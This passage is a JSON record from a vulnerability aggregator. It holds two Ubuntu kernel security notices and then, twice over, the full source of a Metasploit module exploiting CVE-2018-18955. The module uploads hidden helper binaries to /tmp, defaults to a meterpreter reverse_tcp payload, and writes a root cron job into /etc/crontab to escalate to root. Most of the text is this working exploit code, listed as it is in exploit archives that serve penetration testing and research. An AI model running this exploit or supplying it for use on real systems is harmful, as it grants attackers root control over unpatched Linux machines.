could use this to expose sensitive information (protected file names). (CVE-2018-6559)", "modified": "2018-11-30T00:00:00", "published": "2018-11-30T00:00:00", "id": "USN-3832-1", "href": "https://usn.ubuntu.com/3832-1/", "title": "Linux kernel (AWS) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-20T13:22:02", "bulletinFamily": "unix", "description": "Jann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559)", "modified": "2018-11-30T00:00:00", "published": "2018-11-30T00:00:00", "id": "USN-3833-1", "href": "https://usn.ubuntu.com/3833-1/", "title": "Linux kernel (AWS) vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-11-30T12:30:58", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-29T00:00:00", "published": "2018-11-29T00:00:00", "id": "EDB-ID:45915", "href": "https://www.exploit-db.com/exploits/45915", "type": "exploitdb", "title": "Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Nested User Namespace idmap Limit Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,\r\n and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user\r\n namespaces and kernel uid/gid mappings allow elevation to root\r\n (CVE-2018-18955).\r\n\r\n The target system must have unprivileged user namespaces enabled and\r\n the newuidmap and newgidmap helpers installed (from uidmap package).\r\n\r\n This module has been tested successfully on:\r\n\r\n Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64;\r\n Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64);\r\n Linux Mint 19 kernel 4.15.0-20-generic (x86_64);\r\n Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jann Horn', # Discovery and exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Nov 15 2018',\r\n 'Platform' => ['linux'],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n ['BID', '105941'],\r\n ['CVE', '2018-18955'],\r\n ['EDB', '45886'],\r\n ['PACKETSTORM', '150381'],\r\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1712'],\r\n ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955'],\r\n ['URL', 'https://lwn.net/Articles/532593/'],\r\n ['URL', 'https://bugs.launchpad.net/bugs/1801924'],\r\n ['URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955'],\r\n ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-18955'],\r\n ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd'],\r\n ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19'],\r\n ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2']\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'AppendExit' => true,\r\n 'PrependSetresuid' => true,\r\n 'PrependSetreuid' => true,\r\n 'PrependSetuid' => true,\r\n 'PrependFork' => true,\r\n 'WfsDelay' => 60,\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' =>\r\n {\r\n 'AKA' => ['subuid_shell.c']\r\n }\r\n ))\r\n register_options [\r\n OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', %w[Auto True False]])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n chmod path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path, 0755\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file)\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n ['/usr/bin/newuidmap', '/usr/bin/newgidmap'].each do |path|\r\n unless setuid? path\r\n vprint_error \"#{path} is not set-uid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{path} is set-uid\"\r\n end\r\n\r\n # Patched in 4.18.19 and 4.19.2\r\n release = kernel_release\r\n v = Gem::Version.new release.split('-').first\r\n if v < Gem::Version.new('4.15') ||\r\n v >= Gem::Version.new('4.19.2') ||\r\n (v >= Gem::Version.new('4.18.19') && v < Gem::Version.new('4.19'))\r\n vprint_error \"Kernel version #{release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Kernel version #{release} appears to be vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"/bin/sed -i '\\$ d' /etc/crontab\\\"\"\r\n else\r\n session.shell_command(\"/bin/sed -i '\\$ d' /etc/crontab\")\r\n end\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload executables\r\n subuid_shell_name = \".#{rand_text_alphanumeric 5..10}\"\r\n subuid_shell_path = \"#{base_dir}/#{subuid_shell_name}\"\r\n subshell_name = \".#{rand_text_alphanumeric 5..10}\"\r\n subshell_path = \"#{base_dir}/#{subshell_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c')\r\n upload_and_compile subshell_path, exploit_data('subshell.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out')\r\n upload_and_chmodx subshell_path, exploit_data('subshell.out')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Adding cron job...'\r\n output = cmd_exec \"echo \\\"echo '* * * * * root #{payload_path}' >> /etc/crontab\\\" | #{subuid_shell_path} #{subshell_path} \"\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n crontab = read_file '/etc/crontab'\r\n unless crontab.include? payload_path\r\n fail_with Failure::Unknown, 'Failed to add cronjob'\r\n end\r\n\r\n print_good 'Success. Waiting for job to run (may take a minute)...'\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45915"}], "zdt": [{"lastseen": "2018-12-01T19:39:35", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18, and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user namespaces and kernel uid/gid mappings allow elevation to root (CVE-2018-18955). The target system must have unprivileged user namespaces enabled and the newuidmap and newgidmap helpers installed (from uidmap package). This Metasploit module has been tested successfully on: Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64; Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64); Linux Mint 19 kernel 4.15.0-20-generic (x86_64); Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).", "modified": "2018-11-28T00:00:00", "published": "2018-11-28T00:00:00", "id": "1337DAY-ID-31692", "href": "https://0day.today/exploit/description/31692", "title": "Linux Nested User Namespace idmap Limit Local Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Nested User Namespace idmap Limit Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,\r\n and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user\r\n namespaces and kernel uid/gid mappings allow elevation to root\r\n (CVE-2018-18955).\r\n\r\n The target system must have unprivileged user namespaces enabled and\r\n the newuidmap and newgidmap helpers installed (from uidmap package).\r\n\r\n This module has been tested successfully on:\r\n\r\n Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64;\r\n Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64);\r\n Linux Mint 19 kernel 4.15.0-20-generic (x86_64);\r\n Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jann Horn', # Discovery and exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Nov 15 2018',\r\n 'Platform' => ['linux'],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n ['BID', '105941'],\r\n ['CVE', '2018-18955'],\r\n ['EDB', '45886'],\r\n ['PACKETSTORM', '150381'],\r\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1712'],\r\n ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955'],\r\n ['URL', 'https://lwn.net/Articles/532593/'],\r\n ['URL', 'https://bugs.launchpad.net/bugs/1801924'],\r\n ['URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955'],\r\n ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-18955'],\r\n ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd'],\r\n ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19'],\r\n ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2']\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'AppendExit' => true,\r\n 'PrependSetresuid' => true,\r\n 'PrependSetreuid' => true,\r\n 'PrependSetuid' => true,\r\n 'PrependFork' => true,\r\n 'WfsDelay' => 60,\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' =>\r\n {\r\n 'AKA' => ['subuid_shell.c']\r\n }\r\n ))\r\n register_options [\r\n OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', %w[Auto True False]])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n chmod path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path, 0755\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file)\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n ['/usr/bin/newuidmap', '/usr/bin/newgidmap'].each do |path|\r\n unless setuid? path\r\n vprint_error \"#{path} is not set-uid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{path} is set-uid\"\r\n end\r\n\r\n # Patched in 4.18.19 and 4.19.2\r\n release = kernel_release\r\n v = Gem::Version.new release.split('-').first\r\n if v < Gem::Version.new('4.15') ||\r\n v >= Gem::Version.new('4.19.2') ||\r\n (v >= Gem::Version.new('4.18.19') && v < Gem::Version.new('4.19'))\r\n vprint_error \"Kernel version #{release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Kernel version #{release} appears to be vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"/bin/sed -i '\\$ d' /etc/crontab\\\"\"\r\n else\r\n session.shell_command(\"/bin/sed -i '\\$ d' /etc/crontab\")\r\n end\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload executables\r\n subuid_shell_name = \".#{rand_text_alphanumeric 5..10}\"\r\n subuid_shell_path = \"#{base_dir}/#{subuid_shell_name}\"\r\n subshell_name = \".#{rand_text_alphanumeric 5..10}\"\r\n subshell_path = \"#{base_dir}/#{subshell_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c')\r\n upload_and_compile subshell_path, exploit_data('subshell.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out')\r\n upload_and_chmodx subshell_path, exploit_data('subshell.out')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Adding cron job...'\r\n output = cmd_exec \"echo \\\"echo '* * * * * root #{payload_path}' >> /etc/crontab\\\" | #{subuid_shell_path} #{subshell_path} \"\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n crontab = read_file '/etc/crontab'\r\n unless crontab.include? payload_path\r\n fail_with Failure::Unknown, 'Failed to add cronjob'\r\n end\r\n\r\n print_good 'Success. Waiting for job to run (may take a minute)...'\r\n end\r\nend\n\n# 0day.today [2018-12-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31692"}]}